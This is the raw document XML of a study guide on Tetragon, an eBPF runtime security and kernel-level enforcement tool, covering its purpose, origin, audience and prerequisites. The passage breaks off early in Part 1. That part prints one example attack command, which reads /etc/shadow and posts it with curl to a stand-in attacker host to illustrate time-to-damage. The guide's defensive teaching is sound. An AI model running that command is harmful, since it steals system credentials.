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eBPF OBSERVABILITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 8: Tetragon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">A Complete Study Guide on Security Observability and Runtime Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Topics Covered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection + Enforcement  •  Kernel-Level Blocking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Lineage  •  TracingPolicy CRDs  •  BPF LSM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="2400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-Trust Runtime  •  Falco Comparison  •  Production Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond detection. Tetragon can actually STOP the attack — at the kernel, before damage is done.</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Beyond Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1 — The Enforcement Gap Falco Leaves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2 — What Tetragon Is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3 — Detection + Enforcement Philosophy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 4 — Tetragon Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 5 — Process Lineage: The Foundational Signal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 6 — TracingPolicy: The Rule CRD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	52</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 7 — Kernel Hooks Tetragon Uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 8 — How Enforcement Actually Works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	72</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 9 — BPF LSM: The Enforcement Foundation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	82</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 10 — Writing TracingPolicies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 11 — Real-Time Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 12 — The Cilium Integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	110</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 13 — Observability and Event Export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	118</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 14 — Tetragon vs. Falco Deep Comparison</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	126</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 15 — Zero-Trust Runtime Patterns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	134</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 16 — Quick-Reference Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	142</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 17 — Self-Assessment Exercises</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	144</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: Beyond Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.1 The Enforcement Question</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 7 covered Falco — the flagship eBPF DETECTION tool. Falco watches. Falco alerts. But Falco does not BLOCK. A compromised container reading /etc/shadow generates an alert, but the read STILL HAPPENS. The damage is already done when the alert fires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is that enough? For many use cases, yes. Detection + fast response from humans or automation can contain most attacks. But some scenarios demand PREVENTION, not detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HIGH-VALUE SECRETS. If an attacker is about to read your root CA private key, a one-second delay between action and response is too long. You want the read BLOCKED.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPEED OF ATTACK. Modern malware executes payloads in milliseconds. Human response and even Falco Talon automation may be too slow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">COMPLIANCE MANDATES. Some frameworks explicitly require PREVENTION, not just detection. "Ensure unauthorized processes cannot access X" is a prevention requirement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DEFENSE IN DEPTH. Detection catches what prevention misses; prevention stops what would reach humans too late. Mature security runs both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is where Tetragon comes in. Tetragon is eBPF's answer to "we need to actually block, not just alert."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="4472C4" w:sz="18" w:space="12"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">"Detection tells you what happened. Enforcement prevents what shouldn't happen. Tetragon does both — but the enforcement is the game-changer."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.2 The Project Origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon was originated by ISOVALENT — the same company behind Cilium (Module 4). Released as open-source in 2022. Timing aligned with Linux kernel maturing BPF LSM (Linux Security Modules) support, which Tetragon leverages for in-kernel enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key facts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part of the CILIUM PROJECT family (Cilium, Hubble, Tetragon — the three eBPF pillars from Isovalent).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CNCF INCUBATING project (as of 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open-source, Apache 2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also sold commercially as part of ISOVALENT ENTERPRISE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since Isovalent's acquisition by Cisco in 2024, Tetragon is backed by Cisco's resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.3 What This Module Covers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This module covers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why Falco alone is insufficient for some security needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What Tetragon is and how it differs from Falco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TETRAGON'S ARCHITECTURE and how it achieves kernel-level enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM — the kernel feature enforcement depends on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TRACINGPOLICY — Tetragon's Kubernetes-native rule format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PROCESS LINEAGE — Tetragon's foundational observational primitive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">THE CILIUM INTEGRATION story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ZERO-TRUST RUNTIME patterns that Tetragon enables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HONEST COMPARISON with Falco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.4 Audience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three audiences:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.4.1 Teams Already Running Cilium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is the natural security extension. If you're using Cilium, you have the ecosystem, the Isovalent relationship, and likely the kernel requirements. This module gives you the Tetragon-specific knowledge to deploy with confidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.4.2 Teams Evaluating Runtime Security Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you're choosing between Falco, Tetragon, or other runtime security tools, this module complements Module 7 to give you a full picture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.4.3 Security Engineers Pushing for Prevention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If detection alone isn't enough for your threat model, and you're looking at enforcement options, Tetragon is one of the leading open-source answers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0.5 Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This module assumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 1-3: eBPF foundations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 4: Cilium (Tetragon shares heritage).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 7: Falco (key comparison point).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding of Kubernetes CRDs and operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Familiarity with Linux security concepts (LSMs, capabilities, namespaces).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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Enforcement Gap Falco Leaves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 The Time-to-Damage Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Imagine an attacker has compromised your web application and executes the following command in the container:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/shadow &gt; /tmp/out; curl --data-binary @/tmp/out http://attacker.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What actually happens with FALCO detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T=0ms     : Attacker runs the command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
